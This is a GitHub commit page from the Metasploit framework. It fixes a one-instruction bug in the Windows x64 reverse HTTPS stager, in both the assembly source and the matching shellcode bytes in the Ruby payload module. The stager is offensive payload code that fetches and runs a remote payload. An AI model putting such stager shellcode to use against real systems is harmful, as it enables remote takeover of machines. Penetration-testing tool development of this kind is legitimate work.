Skip to content

Commit 0d1f205

Browse files
author
HD Moore
committed
Lands rapid7#4949 which fixes rapid7#4845
2 parents e943cb5 + dab4333 commit 0d1f205

File tree

2 files changed

+2
-2
lines changed

2 files changed

+2
-2
lines changed

external/source/shellcode/windows/x64/src/block/block_reverse_https.asm

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -145,7 +145,7 @@ download_more:
145145
test eax,eax ; download failed? (optional?)
146146
jz failure
147147

148-
mov rax, [rdi]
148+
mov ax, word ptr [edi]
149149
add rbx, rax ; buffer += bytes_received
150150

151151
test rax,rax ; optional?

modules/payloads/stagers/windows/x64/reverse_https.rb

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -85,7 +85,7 @@ def initialize(info = {})
8585
"\xA4\x53\xE5\x00\x00\x00\x00\xFF\xD5\x48\x93\x53\x53\x48\x89\xE7" +
8686
"\x48\x89\xF1\x48\x89\xDA\x49\xB8\x00\x20\x00\x00\x00\x00\x00\x00" +
8787
"\x49\x89\xF9\x49\xBA\x12\x96\x89\xE2\x00\x00\x00\x00\xFF\xD5\x48" +
88-
"\x83\xC4\x20\x85\xC0\x74\x99\x48\x8B\x07\x48\x01\xC3\x48\x85\xC0" +
88+
"\x83\xC4\x20\x85\xC0\x74\x99\x66\x8B\x07\x48\x01\xC3\x48\x85\xC0" +
8989
"\x75\xCE\x58\x58\xC3" +
9090
"\xE8\xD7\xFE\xFF\xFF" #updated jump offset
9191
}

0 commit comments

Comments
 (0)